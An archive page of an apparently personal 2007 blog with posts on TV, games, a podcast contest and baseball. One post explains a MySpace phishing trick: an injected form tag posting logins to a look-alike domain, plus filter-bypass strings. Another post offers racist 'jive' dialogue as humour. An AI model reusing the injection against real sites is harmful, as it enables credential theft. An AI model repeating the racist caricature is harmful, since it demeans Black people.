mgroves

Archive for April, 2007

Some tool at MSNBC, the former network of Don Imus, and current network of Chris Matthews, put out a poll asking what TV shows deserve to be cancelled.

This poll is not that interesting, because it’s not statistically relevant, but it’s interesting for other reasons.

First, the choice of shows on the poll. Go ahead, take a look. Notice anything odd?

I don’t see one reality show on that whole list. Not one! While I think According to Jim is about as funny as the kids at the Imus ranch, it beats the typical reality show crap by far.

So, besides reality shows (which could all be cancelled tomorrow and I wouldn’t shed a tear) what should be cancelled according to the results of this worthless poll?

• Lost (15%)
• ER (12%)
• The Simpsons (12%)
• Desperate Housewives (11%)
• According to Jim (6.7%)

Two of these shows, ER and Simpsons, probably do need to be cancelled, just because they’ve been on too long. Though I’m not really a fan of either, so who knows.

According to Jim is just tripe. Away with it.

What shocked me was that Lost is on the top of the list. The third season isn’t even over, there’s still a ton of questions and interesting stories left, and I think it’s still a great show. Yeah, the ratings have dipped down a bit thanks to American Idol and a new timeslot, but are TV viewers really done with Lost?

I highly doubt it. As I stated before, the sample is heavily biased–this is an unscientific poll. I still find it incredible that out of all the shows on that list, Lost is #1. Thoughts?

Missed the last Tuesday Tube? Head over to the tag search for ‘tuesday tube’ and browse through the archives.

This week on Tuesday Tube: A new RiffTrax preview; this time one of my favorites gets the business. And, completely unrelated to Star Wars or RiffTrax, a couple of clips featuring David Byrne, founder of the Talking Heads.

Frankly, I like all the Star Wars movies, even the ones that are popular to hate. Fanboy? Yes. Even if you don’t agree, I think that any movie is enhanced by the presence of the former cast of MST3K. Here is a clip from the new Episode 2 RiffTrax:

Talking Heads were a pretty awesome 80s group, fronted by David Byrne. Here’s a video for my favorite song from the Heads, “Once in a Lifetime”:

And finally, another clip featuring David Byrne. This one is for Joe. JOE! YOU’RE BRINGIN’ ME DOWN, MAN!

The Do Not Want contest is now underway!

The field is still wide open, as we have only three participants so far.

Here’s the list:

• WelfareHero
• Minywheats
• Stan Hooper

Leave a comment below with your gamertag if you want to join the contest. There’s still plenty of time!

I purchased Super Paper Mario this weekend.

This is actually the first game that I’ve purchased for the Wii, and I did so without even waiting to rent it or try it out.

Let it be known that I am a hater of the original Paper Mario for n64. I rented it, played it for about 2 hours, and then just about threw out it the window. It was terrible. I hated it.

So why did I pick up Super Paper Mario without even playing it?

First, sometimes you just have to follow your heart. I love Mario games, and I have owned just about all of them at one time or another.

Second, this game is not a turn-based RPG. It is an action RPG based around platforming. I’m thinking Mario meets Symphony of the Night.

Third, the 2d-to-3d stuff is really cool. Kinda like the dark-to-light world stuff in Zelda III.

So. I played about 5 levels into the game (as far as I know there are 7, but there are probably more). The game is definitely better than Paper Mario, but that’s like comparing it to limb amputation. It’s better, sure, but what isn’t?

Graphically, it’s very crisp, but very simple. Lots of plain colored shapes and thick lines. As if the game was actually made of paper. The new characters/enemies in the game have a distinctive style, one that I’m not too fond of, but it’s not terrible.

The gameplay–the platforming–is very very good. It’s different from past Mario platformers, but not too much. Figuring out the puzzles is fun as well, but I really wish there was more platforming action. I guess what I really want, is “New Super Mario Bros” for Wii. This is not that.

The dialog/writing for the game is downright hilarious. There’s a whole chapter of the game devoted to making fun of hardcore gamers/fanboys. Lots of third-wall type jokes, and tons of references to just about every Mario game ever made, up to and including Galaxy. If you rush through and don’t read the text, you’re missing out on about half of what makes this game worth playing.

The sound is passable. The music isn’t particularly memorable, except when you get a star and become “giant” Mario (or Princess or Bowser). The text-typing noise is really annoying at first, but I’ve gotten passed that.

Verdict: probably not worth $50, but definitely worth playing. I’d wait until you could find a copy at $30-$40 before purchasing. Also, if you are incredibly skilled at gaming, I would just rent or borrow. This game won’t take you long to finish (at least, as far as I can tell).

Today is the 60th anniversary of the first black player in Major League Baseball: Jackie Robinson.

In honor of Jackie Robinson, Ken Griffey, Jr. is wearing #42, Robinson’s number, during the game today.

Irish Elk also shares a neat story about Jackie Robinson’s days in the minor leagues before the call-up to the Dodgers.

And now, some racial humor, in memory of Don Imus, who isn’t dead.

Stewardess: Would you gentlemen care to order your dinners?

Jive dude: Bet, babe. Slide a piece o’ da’ porter. Drink side, run da’ java.

Jive man: Hey lookie here. I can dig grease ‘n chompin’ on some butter and draggin’ through the garden.

Episode 6 of the Do Not Want podcast has been posted in the usual places.

We are also happy to announce that we have started the first Do Not Want Contest!

For full contest details, just check out the Episode 6 show notes, but here’s the general gist:

• Email any one of us at webmaster@mgroves.com, dreadhead@jards.com, or lbusler@50pixelsofevil.com.
• Email is the preferred method, but you can also just leave a comment below if you want to. Your gamer tag is all we really need, but your name and email address would be useful too.
• If you don’t leave a comment below, just leave a comment on one of the other blogs: The Daily Priapism, or 50 Pixels of Evil.
• If you don’t want to do any of the above…well, uh, smoke signals? Carrier pigeon? Whatever–just get us your gamer tag somehow!

Once we have all the gamer tags, at 5pm on April 16th, we will take a snapshot of your current achievement points. We will take another snapshot on May 1st, 2007. The gamer who has gained the largest amount of points in the meantime will be the winner!

Prize(s):

• The first place winner is guaranteed to receive a 3 Month Xbox Live Gold membership for you to use or to extend your current membership.
• There are no other prizes for sure at this point (this is only the first contest after all), but we will definitely try to throw something else in for the 1st-3rd place winners. Authographed pictures, or CDs of our podcasts, or whatever. Got something you want to give away? Used carpets, old toasters, some pocket lint? Contact us!

You are free to enter the contest after the April 16th start date, but no entries will be accepted after May 1st at 5pm. Cuz that’s when the contest ends. Duh. Please email one of us if you have any questions at all so we can supply additional confusion.

It takes a big man to admit that he screwed up. At least, that’s what I tell myself.

MySpace is the cesspool of the intertubes: angsty teens, dopey high schoolers, awful musicians, spammers, scammers, griefers, hackers, the rock stupid, and me.

MySpace hacks are nothing new. ha.ckers.org comes
across vectors all the time, due to lazy or ignorant programming on behalf of MySpace. Phishing
isn’t new either. A web developer and long-time user of the web shouldn’t fall prey
to either of these attacks. But I did.

Now let me show you how simple the attack was, and how to do it yourself.

Let’s start with the catalyst. A simple message in my MySpace inbox. Click on any
of the following images for a full-size version.

See anything out of the ordinary? Look again:

That form is not submitting to MySpace.com. Chances are, you wouldn’t even think to check the URL that the form submits to. After all, this form is definitely on MySpace.com, and why would their form submit to anything else? (Hindsight is making me feel real dumb at this point).

It turns out that changing the form URL is incredibly easy, or at least it was a day or two ago. Here’s the HTML that makes up the message you see above:

If you are familiar with HTML forms, then you can see exactly what the problem is.
Whoever wrote the message wrote a “close form” tag (</form>) and opened a
new form tag (<form action=”http://login-myspace-viewmessage-mytoken-daw83kz.com/login.cfm.php”>).
Since there was already an existing “open” and “close” form tags already on the page,
the phisher simply broke the form into two pieces, with the 2nd form capturing
the buttons at the bottom of the page, and submitting to a URL of his choosing.

Okay, so big deal, the form goes to some other URL. Why
is that a problem? The exploit here is that most users don’t expect to be
hurtled off of MySpace at that point, which means that if the page they
are hurtled to looks exactly like a MySpace login screen, then that user is
likely to enter their login and password without a second thought. At this point,
the phiser collects a login/password to your account, which means he can send spam,
send more phishing attempts out, vandalize your site, or pretty much do anything
he wants with your MySpace account.

Now maybe you’re thinking: this attacks seems too easy, too obvious. And
you’re right. MySpace allows HTML to be used in these messages, which is
fine, except they don’t filter out potentially problematic HTML, or don’t
filter it out well.

In fact, MySpace is notorious for this type of lazy code. Let’s say you were a really naive
programmer, or stupid, or whatever. If you saw this “</form>” problem, and were tasked
with fixing it, what might you do? Maybe just remove “</form>” from all user input before
sending the message? That’ll work right? Wrong. What if the phisher typed in one of the
following?

• </fo</form>rm>
• </form>

Your find & remove idea wouldn’t work!

Anyway, I could write a lot more about this, but sites like ha.ckers.org
do a much better job.

Let me just show you that I did the same phishing attack in about 2 minutes (I sent my own
account a phishing attempt):

Notice the address at the bottom.

So what’s the point of all this? It’s to show you that phishers aren’t just dumb script kiddies
interested in pranking–they are intelligent, dedicated hackers intent on making a buck. It’s also
to show you that a clever phishing attempt can fool anyone, from “dumb” average users, to
“smart” IT professionals.

Though I suppose this whole article could just be an attempt to cover my shame. Man, I feel
stupid!

37Signals challenged its readers to define what the “real world” is in 10 words or less. As usual for the internet, there were a lot of jaded, pessimistic comments, but there was also some real insight, some clever gems, and some funny one-liners.

Here are some of my favorites…

• “The world where people send 80 MB email attachments.” This was just mentioned at work today…
• “Internet Explorer 6″ This implies so much with only 3 words. The real world is never what you want it to be, while others can’t understand why it needs to be anything else. IE6 is now being phased out, but what was conveyed here is still true. Another user put it, “A place where most of the time, you don’t get your way.” But that’s not less than 10 words.
• “Hindsight is for blind visionaries.” So true.
• “In theory there is no difference between theory and practice. But, in practice, there is.” Okay, so this is what I submitted, and it’s not 10 words or less, but I think this is a really clever quote
• “Mostly harmless.” I love the reference.
• “In the real world, you aren’t limited to 10 words.” Look at a lot of the comments: some people just can’t stand constraints. This guy worked within the constraints to criticize them.
• Adam from Mythbusters: “I reject your reality and substitute my own.” I’ve always liked that quote.
• “Where college professors work before they go into education.” Yeah, if you’re lucky.

Missed the last Tuesday Tube? Head over to the tag search for ‘tuesday tube’ and browse through the archives.

This week on Tuesday Tube, a broken leg, a song about private parts, and a smoke monster! What’s the unifying theme here? Fear, I guess. Fear of breaking a leg while trying to escape from a smoke monster singing about his crotchular region. So watch the videos, or I’m gonna run over your knees with my bike!

Whenever anyone says that pro wrestling is “fake”, I sometimes correct them by saying that it’s not fake: It’s staged. Yeah, there are pulled punches and what not, but these guys take real physical abuse and put themselves at risk every night, just like “real” athletes. Here’s Sid Vicious, breaking his leg on television, which I remember watching live:

Sometimes I ask crazy “what if” questions, just to get my rusty synapses going. Here’s one: What if Henry Winkler starred in a PSA about child molestation? I think it would go a little something…like this:

Please keep your comments on the above video as clean as is possible. Also, for added fun, try watching the video again without laughing or feeling uncomfortable. Statistics say that 95% of you can’t (the other 5% are child molestors).

If you don’t watch Lost, well, you’re missing out. Here’s the best look we’ve had at the smoke monster (Cereberus?) in a while, and we also find out what the fence does (besides melt your brain).

We don’t know what it is, but we know it doesn’t like our fences.